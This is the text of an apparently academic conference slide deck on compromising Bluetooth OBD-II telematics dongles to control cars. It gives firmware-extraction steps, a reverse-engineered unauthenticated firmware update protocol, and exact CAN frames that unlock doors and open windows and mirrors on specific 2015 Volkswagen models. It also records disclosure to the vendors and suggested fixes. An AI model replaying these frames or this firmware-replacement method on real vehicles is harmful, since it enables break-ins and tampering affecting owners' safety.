56
REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue, Le Yu, Xiapu Luo [email protected] Department of Computing The Hong Kong Polytechnic University 1

REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

  • Upload
    others

  • View
    9

  • Download
    1

Embed Size (px)

Citation preview

Page 1: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS

Dawei Lyu, Lei Xue, Le Yu, Xiapu Luo [email protected] Department of Computing

The Hong Kong Polytechnic University

1

Page 2: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

2

Page 3: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

CONTENT

Telematics

Attack Surface

Vulnerable Telematics A

Vulnerable Telematics B

Attacks via Compromised Telematics Systems

Suggestions on Fixing the Vulnerability

Conclusion

3

Page 4: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

TELEMATICS

4

Page 5: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

TELEMATICS

5

Page 6: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

TELEMATICS

6

CAN Bus

OBD II

ECU

Internet

Smartphone with App

Bluetooth

OBD Device

Page 7: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

CAN BUS

Controller Area Network

- Data exchange among ECUs

(Electronic Control Unit)

- More than one CAN bus in a vehicle

Eg: Infotainment CAN bus, Comfort CAN bus,

Diagnostic CAN bus

- Each CAN bus has several ECUs

7

Twisted pair

Differential signal

Page 8: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

CAN BUS

Messages in different CAN buses are exchanged via gateway

OBD-II port is directly connected to gateway.

External devices plugged into OBD port access ECUs through gateway.

8

Page 9: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

CAN MESSAGES

9

Frame ID: 0x7DF DLC: 0x8

Data: 02 09 00 00 00 00 00 00

Require for Mode9 Supported PIDs List

Frame ID: 0x7E8 DLC: 0x8

Data: 06 49 00 54 40 00 00 00

Response from Vehicle

Page 10: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

OBD-II

On-Board Diagnostic

Conduct emissions-related diagnostics

• Status, DTC…

Access selected or all ECUs

• Diagnosis, Re-Configuration, Update

Action testing

It can be exploited to attack the vehicle if a malicious dongle is plugged into it.

10

Page 11: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

OBD-II

16 Pins interface serving for different protocols

- Pin 2&10: SAE J1850PWM, SAE J1850 VPM

- Pin 6&14: ISO 15765, CAN bus! Winner!

- Pin 7&15: ISO 9141-2, KWP2000

11

Page 12: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

CONTENT

Telematics

Attack Surface

Vulnerable Telematics A

Vulnerable Telematics B

Attacks via Compromised Telematics Systems

Suggestions on Fixing the Vulnerability

Conclusion

12

Page 13: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

ATTACK SURFACE

App: Secret in apps, Lack of binary protection, Insecure Data Storage, Data leakage …

Device: Does not verify the signature of firmware, Poor authentication, Trust the app, …

Communication: Default PINs, No encryption, Vulnerable to MITM attack, …

13

Bluetooth

GSM/3G/LTE/WiFi

Page 14: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

DISCLAIMER

For the following vulnerable telematics devices, we have informed the corresponding companies about the vulnerabilities and how to patch them with the help of HKCERT.

14

Page 15: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

CONTENT

Telematics

Attack Surface

Vulnerable Telematics A

Vulnerable Telematics B

Attacks via Compromised Telematics Systems

Suggestions on Fixing the Vulnerability

Conclusion

15

Page 16: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

OBD Device A

Microprocessor + Bluetooth + CAN

Communicate with its app through Bluetooth

16

Top Board: Bluetooth

Bottom Board: MCU + CAN

Page 17: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

17

Since the firmware is

not protected, we can

fetch it via SWD or

JTAG directly.

Monitor CAN Bus (Pin 6&14) Data

Monitor Bluetooth

Communication (between

MCU and Bluetooth device)

Page 18: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

Extract the original firmware!

18

SWD Mode

GND

VCC

SWDIO

SWCLK

J-Link: JTAG debug tool

JTAG Connector

SWD Connector JLINK

Page 19: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

Extract the original firmware!

19

JTAG Connection

Read via JLINK

Success!

Page 20: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

20

Firmware with

IAP function

Boot Part

Application Part

Boot Part

Application Part

Perform IAP function

Perform Real functions IAP, Clear Flag Set flag, goto Boot

Page 21: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

Analyze application part of the firmware

21

Rea

d B

in

Bluetooth Communication Data

APP Logs: Control Data

Commands

Page 22: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

The bin file in the smartphone.

22

The firmware extracted from the device.

Confirmed! The boot

part ends at 8001FFF,

and the application part

starts at 8002000.

Page 23: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

23

Page 24: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

Code Snippet: No obfuscation ! ! !

24

Page 25: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

Start

Scan and find he device

Connect to the device

Create socket for communication

Establish socket connection

Get input and output stream

Bluetooth connection between the app and the device.

25

BluetoothAdapter.startDiscovery()

BluetoothAdapter.getRemoteDevice()

BluetoothDevice.createInsecureRfcommSocketToServiceRecord()

BluetoothSocket.connect()

BluetoothSocket.getInputStream() And BluetoothSocket.getOutputStream()

Page 26: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

Send command

Receive response

Execute the commands

BluetoothSocket.write(byte[])

BluetoothSocket.flush()

BluetoothSocket.read()

26

Page 27: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

/src/framework/base/core/java/android/bluetooth/BluetoothSocket.java 27

Dumping the data sent

through Bluetooth

Page 28: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A

Req: ATRV (Lookup the output voltage)

Ack:11.70

28

Page 29: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS A ATLOCK0

Split the bin file into

fragments (256 bytes) Send the 1st fragment

ACK: 0x06 0x44 0x0D

Send the 2nd fragment

ACK: 0x06 0x44 0x0D Send the last fragment

ACK: 0x06 0x44 0x0D

Send “0x04”

ACK: 0x06 0x44 0x0D Complete and Reboot!

Reverse-engineering the

firmware update protocol

ACK: >OK

ATBOOT

ACK: ELM 327 V1.5

ACK: XXXXXX 627 V1.6.1035 ATBOOT

ACK: >ATBOOT ATBOOT

ACK: 0x15 0x42 ATBOOT

29

Page 30: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

CONTENT

Telematics

Attack Surface

Vulnerable Telematics System A

Vulnerable Telematics System B

Attacks via Compromised Telematics Systems

Suggestions on Fixing the Vulnerability

Conclusion

30

Page 31: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS B OBD Device B

Microprocessor + Bluetooth + CAN1/CAN2 + Sensor

No (firmware) W/R protection

Communicate with its app through Bluetooth

31

Top Board: Bluetooth

Bottom Board: MCU

+ CAN + Sensor

Page 32: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS B

Extract the original firmware!

32

Since the firmware is

not protected, we can

extract it via SWD or

JTAG directly.

Monitor CANbus Data

Monitor Bluetooth

Communication

Page 33: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS B

Analyze the firmware

Firmware Version

Commands

33

Page 34: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS B

Analyze the firmware

34

Firmware from the device Firmware from the app

Confirmed! The boot part

ends at 8001FFF, and the

application part starts at

8002000 (default)

Page 35: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS B

35

Page 36: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS B

Code Snippet: Obfuscated ! ! !

36

Page 37: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS B

It employs the public API for the Bluetooth GATT (Generic Attribute) Profile to conduct the communication.

Bluetooth 4.0 stack

37

Page 38: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

Start

Scan and find the device

Connect to the device

Connect to GATT server hosted by the device

Get the services supported by the device

Select the characteristic for sending command

VULNERABLE TELEMATICS B

Communicate with the device through Bluetooth Low Energy (BLE).

38

BluetoothAdapter.startDiscovery()

BluetoothAdapter.getRemoteDevice()

BluetoothDevice.connectGatt(Context, boolean, callback)

BluetoothGatt.getService(UUID)

BluetoothGattService.getCharacteristics()

Page 39: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

Send command to the BLE device.

Receive response

Execute the commands

BluetoothGattCharacteristic.setValue(byte[])

BluetoothGatt.writeCharacteristic()

BluetoothGatt.onNotify()

VULNERABLE TELEMATICS B

39

Page 40: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS B

/src/framework/base/core/java/android/bluetooth/BluetoothGatt.java 40

Dumping the data sent through BLE.

Page 41: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS B

Req: ATI (Query the firmware version)

Ack: 3.3.0.7

41

Page 42: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VULNERABLE TELEMATICS B

ATBOOT

ATBOOT

ACK: 0x15 Split the bin file into

fragments (256 bytes) Send the 1st fragment

ACK: 0x06

Send the 2nd fragment

ACK: 0x06

Send the last fragment

ACK: 0x06

Send “0x04”

ACK: 0x06

Complete and Reboot

Reverse-engineering the

firmware update protocol

42

Page 43: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

CONTENT

Telematics

Attack Surface

Vulnerable Telematics System A

Vulnerable Telematics System B

Attacks via Compromised Telematics Systems

Suggestions on Fixing the Vulnerability

Conclusion

43

Page 44: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

ATTACKS VIA COMPROMISED TELEMATICS SYSTEMS

Attacks

- Control: Lock&Unlock doors, Open&Close Windows, Open&Close Mirror

- Re-Configuration of ECUs

- …

44

Page 45: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

ATTACKS VIA COMPROMISED TELEMATICS SYSTEMS

Prepare the POC malicious firmware

Re-Implement

some original

functions

Hardware

45

Attack

Functions

Power CAN Bluetooth

Drivers

Automated attacks

that will be executed if

conditions are

satisfied.

Customized attacks

triggered by

commands sent

through Bluetooth

Attack Methods

Page 46: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

ATTACKS VIA COMPROMISED TELEMATICS SYSTEMS

Test Vehicles

- Tiguan 2015 1.8T

- Magotan 2015 1.8T

46

Vehicles running the same platform from Volkswagen

can also be controlled by the OBD messages shown in

the following slides!

Page 47: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

ATTACKS

CAN ID DLC DATA

0x74A

8 {0x10,0x08,0x2F,0x04,0x03,0x03,0xFF,0x03}

8 {0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00}

8 {0x30,0x00,0x14,0x00,0x00,0x00,0x00,0x00}

47

CAN ID DLC DATA

0x74A

8 {0x10,0x08,0x2F,0x04,0x03,0x03,0xFF,0x01}

8 {0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00}

8 {0x30,0x00,0x14,0x00,0x00,0x00,0x00,0x00}

Unlock Doors

Lock Doors

Page 48: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

ATTACKS

48

CAN ID DLC DATA

0x74A

0x74B

8 {0x10,0x08,0x2F,0x04,0x02,0x03,0x05,0x00}

8 {0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00}

8 {0x30,0x00,0x14,0x00,0x00,0x00,0x00,0x00}

0x74A

0x74B

8 {0x10,0x08,0x2F,0x04,0x06,0x03,0x05,0x00}

8 {0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00}

8 {0x30,0x00,0x14,0x00,0x00,0x00,0x00,0x00}

CAN ID DLC DATA

0x74A

0x74B

8 {0x10,0x08,0x2F,0x04,0x01,0x03,0x0A,0x00}

8 {0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00}

8 {0x30,0x00,0x14,0x00,0x00,0x00,0x00,0x00}

0x74A

0x74B

8 {0x10,0x08,0x2F,0x04,0x05,0x03,0x0A,0x00}

8 {0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00}

8 {0x30,0x00,0x14,0x00,0x00,0x00,0x00,0x00}

Open Windows Close Windows

Page 49: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

ATTACKS

49

CAN ID DLC DATA

0x74A

8 {0x10,0x08,0x2F,0x04,0x0C,0x03,0xFF,0x01}

8 {0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00}

8 {0x30,0x00,0x14,0x00,0x00,0x00,0x00,0x00}

CAN ID DLC DATA

0x74A

8 {0x10,0x08,0x2F,0x04,0x0C,0x03,0xFF,0x02}

8 {0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00}

8 {0x30,0x00,0x14,0x00,0x00,0x00,0x00,0x00}

Close Outside Rear View Mirror

Open Outside Rear View Mirror

Page 50: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VIDEO DEMO1

50

Page 51: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

VIDEO DEMO2

51

Page 52: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

CONTENT

Telematics

Attack Surface

Vulnerable Telematics A

Vulnerable Telematics B

Attacks via Compromised Telematics Systems

Suggestions on Fixing the Vulnerability

Conclusion

52

Page 53: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

HOW TO FIX THE VULNERABILITY?

The device should verify the signature of a firmware before installing it;

Mutual authentication;

The communication between the app and the device should be protected by keys/PINs specific to individual users;

Hardened the apps and do not leave secrete (e.g., .bin and PINs) in the apps.

53

Page 54: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

CONCLUSIONS

Discover severe vulnerabilities in popular telematics systems.

Confirm these vulnerabilities through POC attacks on real vehicles.

Propose approaches for fixing these vulnerabilities.

Notify the companies.

54

Page 55: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

WE ARE LOOKING FOR

PhD students with full scholarship

Postdoctoral Fellow and Research Assistants with competitive salary

Topics: Android or System Security and Privacy,

Network Security and Privacy

Blockchain technology

Accountable anonymous credentials

Searchable encryption

Contact: Dr. Xiapu Luo (https://www4.comp.polyu.edu.hk/~csxluo/)

Dr. Man Ho Allen Au (http://www.comp.polyu.edu.hk/~csallen/)

55

Page 56: REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Conf/Hitcon/Hitcon-2016/12… · REMOTE ATTACKS ON VEHICLES BY EXPLOITING VULNERABLE TELEMATICS Dawei Lyu, Lei Xue,

56